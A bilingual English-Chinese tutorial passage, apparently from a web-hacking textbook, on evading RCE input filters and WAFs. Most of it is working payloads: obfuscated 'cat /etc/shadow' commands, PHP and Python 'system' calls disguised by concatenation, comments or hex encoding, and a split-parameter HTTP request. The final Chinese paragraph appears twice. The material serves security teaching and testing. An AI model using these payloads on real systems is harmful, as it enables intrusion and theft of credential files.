Question

Many applications have caught on to the dangers of RCE and employ either input validation or a firewall to stop potentially malicious requests. But programming languages are often quite flexible, and that enables us to work within the bounds of the input validation rules to make our attack work! Here are some basic input validation bypasses you can try in case the application is blocking your payloads.

许多应用程序已经意识到了 RCE 的危险，并采用输入验证或防火墙来阻止潜在的恶意请求。但是编程语言往往非常灵活，这使我们能够在输入验证规则范围内工作，以使我们的攻击有效！以下是一些基本的输入验证绕过方式，如果应用程序正在阻止您的有效载荷，请尝试。

For Unix system commands, you can insert quotes and double quotes without changing the command’s behavior. You can also use wildcards to substitute for arbitrary characters if the system is filtering out certain strings. Finally, any empty command substitution results can be inserted into the string without changing the results. For example, the following commands will all print the contents of /etc/shadow :

对于 Unix 系统命令，您可以插入引号和双引号，而不改变命令的行为。如果系统过滤某些字符串，还可以使用通配符替换任意字符。最后，任何空的命令替换结果都可以插入到字符串中，而不影响结果。例如，以下命令将打印/etc/shadow 的内容。

cat /etc/shadow
cat "/e"tc'/shadow'
cat /etc/sh*dow
cat /etc/sha``dow
cat /etc/sha$()dow
cat /etc/sha${}dow

You can also vary the way you write the same command in PHP. For example, PHP allows you to concatenate function names as strings. You can even hex-encode function names, or insert PHP comments in commands without changing their outcome:

你还可以变换 PHP 中编写同一命令的方式。例如，PHP 允许你将函数名拼接为字符串。你甚至可以十六进制编码函数名称，或在命令中插入 PHP 注释而不影响命令结果。

/* Text surrounded by these brackets are comments in PHP. */

For example, say you want to execute this system command in PHP:

例如，假设你想在 PHP 中执行这个系统命令：

system('cat /etc/shadow');

The following example executes a system command by concatenating the strings sys and tem :

下面的示例通过连接字符串 sys 和 tem 来执行系统命令：

('sys'.'tem')('cat /etc/shadow');

The following example does the same thing but inserts a blank comment in the middle of the command:

以下示例做同样的事情，但在命令中间插入了一个空白注释：

system/**/('ls');

And this line of code is a hex-encoded version of the system command:

这行代码是系统命令的十六进制编码版本：

'\x73\x79\x73\x74\x65\x6d'('ls');

Similar behavior exists in Python. The following are all equivalent in Python syntax:

Python 中存在类似的行为。以下所有内容在 Python 语法中都是等价的：

__import__('os').system('cat /etc/shadow')
__import__('o'+'s').system('cat /etc/shadow')
__import__('\x6f\x73').system('cat /etc/shadow')

Additionally, some servers concatenate the values of multiple parameters that have the same name into a single value. In this case, you can split malicious code into chunks to bypass input validation. For example, if the firewall blocks requests that contain the string system , you can split your RCE payload into chunks, like so:

此外，一些服务器将具有相同名称的多个参数的值连接成单个值。在这种情况下，您可以将恶意代码拆分成块以绕过输入验证。例如，如果防火墙阻止请求包含字符串“system”，您可以将 RCE 有效负载分成多个块，例如：

GET /calculator?calc="__import__('os').sy"&calc="stem('ls')"
Host: example.com

The parameters will get through the firewall without issue, since the request technically doesn’t contain the string system . But when the server processes the request, the parameter values will be concatenated into a single string that forms our RCE payload: "__import__('os').system('ls')" .

参数将会在防火墙中通过，因为该请求在技术上不包含字符串 "system"。但是当服务器处理该请求时，参数值将被连接成一个单一的字符串，形成我们的 RCE 载荷: "__import__('os').system('ls')".

This is only a tiny subset of filter bypasses you can try; many more exist. For example, you can hex-encode, URL-encode, double-URL-encode, and vary the cases (uppercase or lowercase characters) of your payloads. You can also try to insert special characters such as null bytes, newline characters, escape characters (\) , and other special or non-ASCII characters into the payload. Then, observe which payloads are blocked and which ones succeed, and craft exploits that will bypass the filter to accomplish your desired results. If you’re interested in this topic, search online for RCE filter bypass or WAF bypass to learn more. Additionally, the principles mentioned in this section can be used to bypass input validation for other vulnerabilities as well, such as SQL injection and XSS.

这仅仅是一小部分可以尝试的绕过过滤器的方法；还有很多其他的方法存在。例如，你可以进行十六进制编码、URL 编码、双倍 URL 编码和变化大小写字符的有效载荷。你也可以尝试插入特殊字符，如空字节、换行符、转义字符(\) 和其他特殊或非 ASCII 字符到有效载荷中。然后观察哪些有效载荷被阻止了，哪些成功了，并设计绕过过滤器的漏洞利用程序来达到你想要的结果。如果你对这个主题感兴趣，请搜索 RCE 过滤器绕过或 WAF 绕过来了解更多。此外，本节提到的原则同样可以用于绕过输入验证的其他漏洞，如 SQL 注入和 XSS。 这只是您可以尝试的绕过过滤器的微小子集；还有更多种方法。例如，您可以使用十六进制编码、URL 编码、双倍 URL 编码，并更改有效载荷的大小写。您还可以尝试插入特殊字符，如空字节、换行符、转义字符（\）和其他特殊或非 ASCII 字符到有效载荷中。然后观察哪些有效载荷被阻止，哪些成功，并设计绕过过滤器的漏洞利用程序来实现您想要的结果。如果您对此主题感兴趣，请在线搜索 RCE 过滤器绕过或 WAF 绕过以了解更多信息。此外，本节提到的原则也可用于绕过其他漏洞的输入验证，例如 SQL 注入和 XSS。